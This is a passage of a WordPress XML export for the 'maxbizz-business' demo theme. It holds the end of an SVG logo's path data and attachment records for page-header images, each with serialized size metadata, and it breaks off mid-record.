		<path class="st0" d="M90.4,17.4v-5h-1.8v-1.6h1.8V8.3l2-0.4v2.9h2.5v1.6h-2.5V17c0,0.4,0.1,0.8,0.3,0.9c0.2,0.2,0.5,0.3,1,0.3    c0.2,0,0.4,0,0.6,0c0.2,0,0.4-0.1,0.7-0.2v1.7c-0.3,0.1-0.6,0.1-0.9,0.2c-0.3,0-0.6,0.1-0.9,0.1c-0.9,0-1.6-0.2-2.1-0.6    S90.4,18.3,90.4,17.4z"></path>
		<path class="st0" d="M104.3,18.7c-0.6,0.5-1.1,0.8-1.7,1c-0.6,0.2-1.2,0.3-1.9,0.3c-0.6,0-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.5-1    s-0.7-0.9-1-1.5s-0.4-1.2-0.4-1.8c0-0.7,0.1-1.3,0.3-1.8c0.2-0.6,0.5-1.1,0.9-1.5s0.9-0.7,1.4-1s1.1-0.4,1.7-0.4    c0.6,0,1.2,0.1,1.7,0.4c0.5,0.2,1,0.6,1.3,1s0.7,0.9,0.9,1.5c0.2,0.6,0.3,1.2,0.3,1.9v0.5h-6.7c0.1,0.7,0.4,1.3,0.9,1.8    s1.1,0.7,1.8,0.7c0.4,0,0.8-0.1,1.2-0.2c0.4-0.1,0.7-0.4,0.9-0.6L104.3,18.7z M100.5,12.3c-0.6,0-1.1,0.2-1.5,0.6    c-0.4,0.4-0.7,1-0.8,1.6h4.7c-0.1-0.7-0.4-1.2-0.8-1.6S101.1,12.3,100.5,12.3z"></path>
		<path class="st0" d="M106.9,19.8v-9h2v2c0.2-0.7,0.6-1.2,1-1.6s0.9-0.5,1.5-0.5c0.2,0,0.3,0,0.4,0.1c0.1,0,0.3,0.1,0.4,0.1v1.8    c-0.2-0.1-0.3-0.1-0.5-0.2s-0.4-0.1-0.6-0.1c-0.5,0-0.9,0.1-1.3,0.4c-0.4,0.3-0.7,0.6-0.9,1.1v5.9H106.9z"></path>
		<path class="st0" d="M115,9c-0.3,0-0.6-0.1-0.9-0.4s-0.4-0.5-0.4-0.9c0-0.3,0.1-0.6,0.4-0.9c0.3-0.3,0.5-0.4,0.9-0.4    c0.3,0,0.6,0.1,0.9,0.4c0.3,0.3,0.4,0.5,0.4,0.9c0,0.3-0.1,0.6-0.4,0.9S115.3,9,115,9z M116,10.8v9h-2v-9H116z"></path>
		<path class="st0" d="M118.1,15.3c0-0.7,0.1-1.3,0.4-1.8c0.2-0.6,0.6-1.1,1-1.5c0.4-0.4,0.9-0.7,1.4-1c0.6-0.2,1.2-0.4,1.8-0.4    c0.6,0,1.2,0.1,1.8,0.4s1,0.6,1.4,1s0.7,0.9,1,1.5c0.2,0.6,0.3,1.2,0.3,1.8s-0.1,1.3-0.4,1.9c-0.2,0.6-0.6,1.1-1,1.5    c-0.4,0.4-0.9,0.7-1.4,1c-0.6,0.2-1.2,0.4-1.8,0.4s-1.2-0.1-1.8-0.4c-0.6-0.2-1-0.6-1.4-1c-0.4-0.4-0.7-0.9-1-1.5    C118.2,16.6,118.1,16,118.1,15.3z M122.6,18.2c0.7,0,1.3-0.3,1.8-0.8c0.5-0.6,0.7-1.2,0.7-2.1c0-0.9-0.2-1.6-0.7-2.1    c-0.5-0.6-1.1-0.8-1.8-0.8c-0.7,0-1.3,0.3-1.8,0.8c-0.5,0.6-0.7,1.3-0.7,2.1c0,0.8,0.2,1.5,0.7,2.1    C121.3,18,121.9,18.2,122.6,18.2z"></path>
	</g>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-about-us</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/pheader-about-us/</link>
		<pubDate>Tue, 29 Dec 2020 07:56:40 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-about-us.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2021</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:56:40]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:56:40]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-about-us]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-about-us.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/pheader-about-us.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:28:"2020/12/pheader-about-us.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:27:"pheader-about-us-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"pheader-about-us-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:28:"pheader-about-us-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"pheader-about-us-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:29:"pheader-about-us-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:28:"pheader-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:28:"pheader-about-us-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:29:"pheader-about-us-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:29:"pheader-about-us-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-blog</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/pheader-blog/</link>
		<pubDate>Tue, 29 Dec 2020 07:56:41 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-blog.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2022</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:56:41]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:56:41]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-blog]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-blog.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/pheader-blog.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:24:"2020/12/pheader-blog.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:23:"pheader-blog-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"pheader-blog-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"pheader-blog-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"pheader-blog-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:25:"pheader-blog-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-blog-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-blog-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:25:"pheader-blog-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:25:"pheader-blog-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-contacts</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/pheader-contacts/</link>
		<pubDate>Tue, 29 Dec 2020 07:56:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-contacts.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2023</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:56:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:56:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-contacts]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-contacts.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/pheader-contacts.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:28:"2020/12/pheader-contacts.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:27:"pheader-contacts-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"pheader-contacts-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:28:"pheader-contacts-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"pheader-contacts-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:29:"pheader-contacts-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:28:"pheader-contacts-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:28:"pheader-contacts-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:29:"pheader-contacts-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:29:"pheader-contacts-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-elements</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/pheader-elements/</link>
		<pubDate>Tue, 29 Dec 2020 07:56:45 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-elements.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2024</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:56:45]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:56:45]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-elements]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-elements.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/pheader-elements.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:28:"2020/12/pheader-elements.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:27:"pheader-elements-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:29:"pheader-elements-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:28:"pheader-elements-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"pheader-elements-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:29:"pheader-elements-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:28:"pheader-elements-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:28:"pheader-elements-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:29:"pheader-elements-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:29:"pheader-elements-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-faq</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/pheader-faq/</link>
		<pubDate>Tue, 29 Dec 2020 07:56:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-faq.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2025</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:56:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:56:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-faq]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-faq.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/pheader-faq.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:23:"2020/12/pheader-faq.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:22:"pheader-faq-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:24:"pheader-faq-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:23:"pheader-faq-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"pheader-faq-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:24:"pheader-faq-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:23:"pheader-faq-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:23:"pheader-faq-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"pheader-faq-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:24:"pheader-faq-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-project</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/pheader-project/</link>
		<pubDate>Tue, 29 Dec 2020 07:56:48 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-project.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2026</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:56:48]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:56:48]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-project]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-project.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/pheader-project.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:27:"2020/12/pheader-project.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:26:"pheader-project-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"pheader-project-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:27:"pheader-project-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"pheader-project-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:28:"pheader-project-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:27:"pheader-project-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:27:"pheader-project-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:28:"pheader-project-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:28:"pheader-project-1200x400.jpg";s:5:"width";i:1200;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>pheader-shop</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/pheader-shop/</link>
		<pubDate>Tue, 29 Dec 2020 07:56:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/pheader-shop.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2027</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:56:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:56:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[pheader-shop]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/pheader-shop.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/pheader-shop.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:400;s:4:"file";s:24:"2020/12/pheader-shop.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:23:"pheader-shop-300x63.jpg";s:5:"width";i:300;s:6:"height";i:63;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"pheader-shop-1024x213.jpg";s:5:"width";i:1024;s:6:"height";i:213;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"pheader-shop-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"pheader-shop-768x160.jpg";s:5:"width";i:768;s:6:"height";i:160;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:25:"pheader-shop-1536x320.jpg";s:5:"width";i:1536;s:6:"height";i:320;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-shop-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"pheader-shop-600x400.jpg";s:5:"width";i:600;s:6: